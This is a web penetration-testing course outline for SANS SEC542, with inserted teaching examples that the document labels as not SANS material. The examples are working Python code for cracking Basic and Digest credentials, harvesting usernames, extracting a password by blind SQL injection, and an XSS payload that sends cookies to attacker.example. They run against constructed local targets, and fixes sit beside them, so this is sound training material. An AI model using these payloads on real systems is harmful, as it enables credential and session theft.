Security 542 :: Web App Penetration Testing and Ethical Hacking
Overview
Assess Your Web Apps in Depth
Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited Web sites altered by attackers. In this intermediate to advanced level class, you'll learn the art of exploiting Web applications so you can find flaws in your enterprise's Web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for Web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross-Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And you will explore various other Web app vulnerabilities in depth with tried-and-true techniques for finding them using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.
On day one, we will study the attacker's view of the Web as well as learn an attack methodology and how the pen-tester uses JavaScript within the test. On day two, we will study the art of reconnaissance, specifically targeted to Web applications. We will also examine the mapping phase as we interact with a real application to determine its internal structure. During day three we will continue our test by starting the discovery phase using the information we gathered on day two. We will focus on application/server-side discovery. On day four we will continue discovery, focusing on client-side portions of the application, such as Flash objects and Java applets. On day five, we will move into the final stage of exploitation. Students will use advanced exploitation methods to gain further access within the application. Day six will be a Capture the Flag event where the students will be able to use the methodology and techniques explored during class to find and exploit the vulnerabilities within an intranet site.
Throughout the class, you will learn the context behind the attacks so that you intuitively understand the real-life applications of our exploitation. In the end, you will be able to assess your own organization's Web applications to find some of the most common and damaging Web application vulnerabilities today.
By knowing your enemy, you can defeat your enemy. General security practitioners, as well as Web site designers, architects, and developers, will benefit from learning the practical art of Web application penetration testing in this class.
Sampling of Topics
- Topics Covered
- Explore methods to zombify browsers
- Discuss using zombies to port scan or attack internal networks
- Explore attack frameworks
- AttackAPI
- BeEF
- XSS-Proxy
- Walk through an entire attack scenario
- Exploit the various vulnerabilities discovered
- Leverage the attacks to gain access to the system
- Learn how to pivot our attacks through a Web application
- Understand methods of interacting with a server through SQL injection
- Exploit applications to steal cookies
- Execute commands through Web application vulnerabilities
Laptop
Laptop Requirements: Minimum hardware requirements:
- 1GHz processor
- 512MB RAM (1+GB highly recommended)
- 5GB free hard disk space
- CD ROM drive
A laptop with Windows 2000, XP, or Vista is required with the latest Service Packs and patches. Windows XP Pro is preferred, but Windows XP Home should work. Do not use server OSes such as Windows 2000 Server or Windows 2003 Server. Please install the following software on the computer:
- VMWare Player 2.x or VMWare Workstation 6.x or newer (Server and ESX are not supported)
- Firefox browser (latest version)
Apple laptops are also supported. The student must install VMWare Fusion 2.x and UnrarX.
You must have ability to disable the host firewall (Windows firewall or other third party firewall) and antivirus running on your desktop. This usually means you need to have administrative privilege on the machine.
DO NOT plan on just killing your antivirus service or processes, because most antivirus tools still function even when their associated services and processes have been terminated.
Day Information
Day 1
Web App Penetration Testing and Ethical Hacking: The Attacker's View of the Web
Understanding the attacker's perspective is key to successful Web application penetration testing. We will begin by thoroughly examining Web technology, including protocols, languages, clients, and server architectures, from the attacker's perspective. In this portion of the class we will also examine different authentication systems, including Basic, Digest, Forms, and Windows Integrated authentication, and discuss how servers use them and how attackers abuse them.
Following this, we will discuss the four steps that make up our process for conducting Web application penetration tests: reconnaissance, mapping, discovery and exploitation. During the next few days, we will delve into each of these steps more deeply. For the first day, we will review the fundamental principles of each phase and discuss how we will use them together as a cyclical attack process. Next, we will cover the types of penetration testing and what pieces need to be part of the report. As the final part of the day, we will explore and learn JavaScript from an attacker's perspective.
- Topics Covered
- Overview of the Web from a penetration tester’s perspective
- Exploring the various servers and clients
- Discussion of the various Web architectures
- Discover how session state works
- Discussion of the different types of vulnerabilities
- Define a Web application test scope and process
- Define types of penetration testing
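The day-one discussion of how attackers abuse Basic and Digest authentication, as an added example that is not part of the SANS course material: Basic is a reversible encoding, so a captured Authorization header yields the password outright, while Digest (RFC 2617, qop=auth with MD5) sends only a hash and has to be attacked offline with a wordlist. The realm, host, nonces and credentials below are constructed for the example, and the captured Digest header is produced with the same response computation a browser would use.

```python
"""Added example, not SANS course material: HTTP Basic and Digest
authentication from the attacker's side. All headers are constructed."""
import base64
import hashlib


def recover_basic(authorization_header):
    """'Basic <base64(user:pass)>' -> (user, pass). Whoever sees the header
    (proxy log, sniffer on plain HTTP) has the credentials."""
    scheme, _, token = authorization_header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """The 'response' value a client computes for qop=auth (RFC 2617 3.2.2.1)."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def parse_digest(authorization_header):
    """Split 'Digest k="v", k=v, ...' into a dict (values here contain no commas)."""
    scheme, _, params = authorization_header.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest credential")
    fields = {}
    for part in params.split(","):
        key, _, value = part.strip().partition("=")
        fields[key] = value.strip('"')
    return fields


def crack_digest(authorization_header, method, wordlist):
    """Offline dictionary attack: recompute the response for each candidate
    password and compare with the captured one. Returns the password or None."""
    f = parse_digest(authorization_header)
    for candidate in wordlist:
        guess = digest_response(f["username"], f["realm"], candidate, method,
                                f["uri"], f["nonce"], f["nc"], f["cnonce"],
                                f.get("qop", "auth"))
        if guess == f["response"]:
            return candidate
    return None


# Constructed captures, as a proxy or sniffer would see them (hypothetical realm).
CAPTURED_BASIC = "Basic YWxpY2U6czNjcmV0"  # base64 of alice:s3cret
_NONCE, _CNONCE, _NC = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "0a4f113b", "00000001"
CAPTURED_DIGEST = (
    'Digest username="alice", realm="intranet", nonce="%s", uri="/admin/", '
    'qop=auth, nc=%s, cnonce="%s", response="%s"'
    % (_NONCE, _NC, _CNONCE,
       digest_response("alice", "intranet", "s3cret", "GET", "/admin/",
                       _NONCE, _NC, _CNONCE))
)

if __name__ == "__main__":
    print(recover_basic(CAPTURED_BASIC))
    print(crack_digest(CAPTURED_DIGEST, "GET", ["password", "letmein", "s3cret"]))
```

The practical point for a tester: Basic over plain HTTP is equivalent to sending the password in clear, and Digest only raises the cost to one MD5 chain per guess, so a weak password still falls to a captured exchange without ever touching the server again.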
Day 2
Web Penetration Testing and Ethical Hacking: Reconnaissance and Mapping
On the second day we will start the actual penetration testing process, beginning with the reconnaissance and mapping phases. Reconnaissance includes gathering publicly available information regarding the target application and organization, identifying the machines which support our target application, and building a profile of each server, including operating system, specific software, and configuration. Our discussion will be augmented by practical, hands-on exercises in which we conduct reconnaissance against an in-class target.
In the mapping phase, we will build a map or diagram of the application. In order to do this, we identify the components, analyze the relationship between them, and determine how the pieces work together. We will specifically consider how the session management system works within an application. This will help us identify potential vulnerabilities during the next sections.
- Topics Covered
- Discover the infrastructure within the application
- Identify the machines and operating systems
- SSL configurations and weaknesses
- Explore virtual hosting and its impact on testing
- Learn methods to identify load balancers
- Software configuration discovery
- Explore external information sources
- Google hacking
- Learn tools to spider a Web site
- Scripting to automate Web requests and spidering
- Application flow charting
- Relationship analysis within an application
- JavaScript for the attacker
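The mapping phase above (spidering, scripting Web requests, and application flow charting), as an added example that is not part of the SANS course material: a minimal spider that stays within the target host, records page-to-page links as the edges of the application map, and inventories every form and request parameter it meets, which is the attack surface the discovery phase then works through. To run offline it walks a constructed in-memory site under the hypothetical host target.example; replacing fetch() with a real HTTP GET is the only change needed against a target you are authorised to test.

```python
"""Added example, not SANS course material: a scope-aware spider that builds
the application map and parameter inventory. The target site is constructed."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse

# Constructed target: URL -> HTML body. target.example is a hypothetical host.
SITE = {
    "http://target.example/": '<a href="/login">Login</a> <a href="/products?cat=1">Shop</a>'
                              '<a href="http://other.example/">Partner</a>',
    "http://target.example/login": '<form action="/login" method="post">'
                                   '<input name="user"><input name="pass" type="password">'
                                   '</form>',
    "http://target.example/products?cat=1": '<a href="/">Home</a><a href="/products?cat=2">More</a>',
    "http://target.example/products?cat=2": '<a href="/login">Login</a>',
}


def fetch(url):
    """Stand-in for an HTTP GET; None plays the role of a 404."""
    return SITE.get(url)


class LinkParser(HTMLParser):
    """Collects absolute link targets and forms (action, method, input names)."""

    def __init__(self, base):
        super().__init__()
        self.base = base
        self.links, self.forms = [], []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base, a["href"]))
        elif tag == "form":
            self._form = {"action": urljoin(self.base, a.get("action", self.base)),
                          "method": a.get("method", "get").upper(), "inputs": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            self._form["inputs"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def spider(start, max_pages=100):
    """Breadth-first crawl limited to the start URL's host."""
    host = urlparse(start).netloc
    queue, seen = [start], set()
    edges, forms, params = [], [], {}
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        body = fetch(url)
        if body is None:
            continue
        # GET parameters on the URL itself are part of the inventory.
        parsed = urlparse(url)
        for name in parse_qs(parsed.query):
            params.setdefault(parsed.path, set()).add(name)
        p = LinkParser(url)
        p.feed(body)
        for link in p.links:
            edges.append((url, link))          # map edge, even if out of scope
            if urlparse(link).netloc == host:  # but only crawl in scope
                queue.append(link)
        for f in p.forms:
            forms.append((f["method"], f["action"], tuple(f["inputs"])))
            for name in f["inputs"]:
                params.setdefault(urlparse(f["action"]).path, set()).add(name)
    return {"pages": sorted(seen), "edges": edges, "forms": forms, "params": params}


if __name__ == "__main__":
    result = spider("http://target.example/")
    for src, dst in result["edges"]:
        print(f"{src} -> {dst}")
    print(result["forms"], result["params"])
```

The edges list feeds straight into a flow chart, and the params dict (path to parameter names) is the checklist for injection testing on day three; the out-of-scope link to other.example is recorded on the map but never requested, which is the scoping discipline a real engagement requires.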
Day 3
Web Penetration Testing and Ethical Hacking: Server-Side Discovery
In this section, we will continue to explore our methodology with the discovery phase. We will build upon the information started yesterday, exploring methods to find and verify vulnerabilities within the application. The students will also begin to explore the interactions between the various vulnerabilities.
After we cover vulnerabilities, we will explore the different user interfaces that Web apps expose to clients. This will include an exploration of various automated and manual tools, such as w3af, Burp Suite, and the SamuraiWTF pen-testing environment.
Throughout the discovery phase, we will explore both manual and automated methods of discovering vulnerabilities within applications and discuss the circumstances under which each is appropriate.
- Topics Covered
- Learn methods to discover various vulnerabilities
- Information leakage
- Username harvesting
- Command injection
- SQL injection
- Blind SQL injection
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery
- Session issues
- Explore differences between different data back-ends
- Explore fuzzing and various fuzzing tools
- Discuss the different interfaces Web sites contain
- Understand methods for attacking Web services
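Two of the day-three findings above, username harvesting and blind SQL injection, as an added example that is not part of the SANS course material. A constructed login backed by an in-memory SQLite table (the table, users and passwords are invented) builds its query by string concatenation and returns different messages for an unknown user and a wrong password. The harvesting function exploits the second defect directly; the blind-injection routine exploits the first, learning the administrator's password one character at a time from nothing but yes/no answers. A parameterised, uniform-message version of the same login is included beside it.

```python
"""Added example, not SANS course material: username harvesting and
boolean-based blind SQL injection against a constructed SQLite login."""
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)",
               [("admin", "Summer2010"), ("bob", "hunter2")])  # constructed data


def login(username, password):
    """Vulnerable on purpose: string-built SQL and distinct failure messages."""
    row = db.execute(
        f"SELECT password FROM users WHERE name = '{username}'").fetchone()
    if row is None:
        return "unknown user"
    return "ok" if row[0] == password else "wrong password"


def harvest_usernames(candidates):
    """The error text alone tells us which accounts exist."""
    return [u for u in candidates if login(u, "x") != "unknown user"]


def truth(condition, user="admin"):
    """Oracle: does the injected SQL condition hold for the given user's row?
    The page never shows data; it only tells us whether the row was found."""
    payload = f"{user}' AND ({condition}) AND '1'='1"
    return login(payload, "x") != "unknown user"


def extract_password(user="admin"):
    """Recover the password column for one user via the oracle."""
    length = 0
    while not truth(f"LENGTH(password) = {length}", user):
        length += 1
        if length > 64:
            raise RuntimeError("oracle is not answering consistently")
    out = ""
    for pos in range(1, length + 1):
        # Binary search the code point of each character (printable ASCII).
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if truth(f"UNICODE(SUBSTR(password, {pos}, 1)) > {mid}", user):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def login_safe(username, password):
    """Fixed: bound parameter, and one message whichever check failed."""
    row = db.execute("SELECT password FROM users WHERE name = ?",
                     (username,)).fetchone()
    if row is not None and row[0] == password:
        return "ok"
    return "login failed"


if __name__ == "__main__":
    print(harvest_usernames(["admin", "alice", "bob"]))
    print(extract_password("admin"))
```

Each character costs about seven requests with the binary search, which is why blind injection is practical even when the application leaks nothing but a found/not-found distinction; when even that is absent, the same oracle is built from response timing instead.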
Day 4
Web Penetration Testing and Ethical Hacking: Client-Side Discovery
On day four students will start exploring client side portions of the Web site. We will cover methods to discover vulnerabilities within client-side code, such as Java applets and Flash objects. We will learn how to use tools to decompile the objects and applets to find vulnerabilities. Tools such as Flare and JAD will be used during hands-on exercises. This will include a detailed discussion of Web Services and AJAX in which we will explore how AJAX and Web service technology enlarge the attack surface that penetration testers leverage. We will also explore how AJAX and Web services are affected by the vulnerabilities already explored.
Students will also be able to understand the ways that these client-side components can be used to attack other portions of the network and Web application. Students will also be using various tools and methods to discover ways to interact with Web applications bypassing these client-side controls.
Students will also work through sections on both Python and PHP. These sections focus on the use of these languages during a penetration test and from the view of an attacker.
- Topics Covered
- Learn methods to discover various vulnerabilities
- Information leakage
- Username harvesting
- Command injection
- SQL injection
- Blind SQL injection
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery
- Learn methods to decompile client-side code
- Flash
- Java
- etc.
- Explore malicious applets and objects
- Discover vulnerabilities in Web applications through their client components
- Understand methods for attacking Web services
- Understand methods for testing Web 2.0 and AJAX based sites
- Learn how AJAX and Web services change penetration tests
- Learn the attacker’s perspective on Python and PHP
- The use of these languages during our attack
- The ability to expand the tools we are using
Day 5
Web Penetration Testing and Ethical Hacking: Exploitation
On the fifth day we will launch actual exploits against real-world applications. In this component, we will build upon the previous three steps, expanding our foothold within the application and extending that to the network on which it resides. As penetration testers, we will specifically focus on ways that we can leverage previously discovered vulnerabilities to gain further access, highlighting the cyclical nature of our four-step attack methodology.
During our exploitation, we will use tools such as the Burp Suite and Paros Proxy to assist us in crafting exploits against real-world applications like Wordpress and AWStats. We will launch an SQL injection attack against Wordpress, intercepting real transactions and modifying them. We will use Cross-Site Scripting attacks against phpMyAdmin and phpBB to steal cookies and sessions from other users.
We are also going to explore the use of attack frameworks, such as AttackAPI and BeEF. We will discuss how the frameworks can assist us in our testing process, gaining access to browser history, port scanning internal networks, and searching for other vulnerable Web applications through zombie browsers.
We will also explore multiple exploit attacks. This is where the student will build complex attack series to gain much greater access within the Web applications. By fully uncovering vulnerabilities within applications using the same resources as attackers, we can provide organizations with the best assessment possible.
- Topics Covered
- Explore methods to zombify browsers
- Discuss using zombies to port scan or attack internal networks
- Explore attack frameworks
- AttackAPI
- BeEF
- XSS-Proxy
- Walk through an entire attack scenario
- Exploit the various vulnerabilities discovered
- Leverage the attacks to gain access to the system
- Learn how to pivot our attacks through a Web application
- Understand methods of interacting with a server through SQL injection
- Exploit applications to steal cookies
- Execute commands through Web application vulnerabilities
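The cookie-theft exploitation described for day five, as an added example that is not part of the SANS course material: a page that reflects a search term is shown beside its fixed form, with a payload that makes the victim's browser send document.cookie to a listener (attacker.example is a hypothetical host). A second pair covers the caveat testers most often trip over: when the reflection lands inside an inline script, JSON-encoding alone is not enough, because the HTML parser ends the script element at the first `</script>` it sees regardless of JavaScript string syntax. The script counter uses Python's HTMLParser to judge each rendering the way a browser would tokenise it.

```python
"""Added example, not SANS course material: reflected XSS cookie theft in
element and inline-script context, each beside its hardened rendering."""
import html
import json
from html.parser import HTMLParser

# Constructed payloads; attacker.example is a hypothetical listener.
HTML_PAYLOAD = ("<script>new Image().src='http://attacker.example/c?'"
                "+document.cookie</script>")
JS_PAYLOAD = "</script>" + HTML_PAYLOAD


def render_results_vulnerable(query):
    """Reflects the query straight into the element body."""
    return f"<h1>Results for {query}</h1>"


def render_results_fixed(query):
    """HTML entity encoding is the right encoding for element content."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def render_inline_js_naive(query):
    """JSON encoding handles quotes, but the tokeniser still closes the
    script element at the first '</script>' inside the literal."""
    return f"<script>var q = {json.dumps(query)};</script>"


def render_inline_js_fixed(query):
    """Also break '</' so no closing tag can appear inside the literal."""
    safe = json.dumps(query).replace("</", "<\\/")
    return f"<script>var q = {safe};</script>"


class _ScriptCounter(HTMLParser):
    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def script_blocks(page):
    """Number of script elements a browser's tokeniser would open.
    A count above what the template itself contains means the payload ran."""
    p = _ScriptCounter()
    p.feed(page)
    p.close()
    return p.count


if __name__ == "__main__":
    for name, page in [("body/vulnerable", render_results_vulnerable(HTML_PAYLOAD)),
                       ("body/fixed", render_results_fixed(HTML_PAYLOAD)),
                       ("js/naive", render_inline_js_naive(JS_PAYLOAD)),
                       ("js/fixed", render_inline_js_fixed(JS_PAYLOAD))]:
        print(f"{name}: {script_blocks(page)} script element(s)")
```

Two defensive notes follow from this: output encoding has to match the context the value lands in (element body, attribute, inline script), and marking the session cookie HttpOnly keeps document.cookie from exposing it even when an injection is missed, which is exactly the path the phpMyAdmin and phpBB exercises rely on.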
Day 6
Web Penetration Testing and Ethical Hacking: Capture the Flag
During day six of the class students will be placed on a network and given the opportunity to complete an entire penetration test. The goal of this capture the flag event is for the students to explore the techniques, tools, and methodology they have learned over the last five days. They will be able to use these ideas and methods against a realistic intranet application. At the end of the day, they will provide a verbal report of the findings and methodology they followed to complete the test.
Students will be provided with a virtual machine that contains the SamuraiWTF Web penetration testing environment. They will be able to use this both in the class and after leaving and returning to their normal jobs.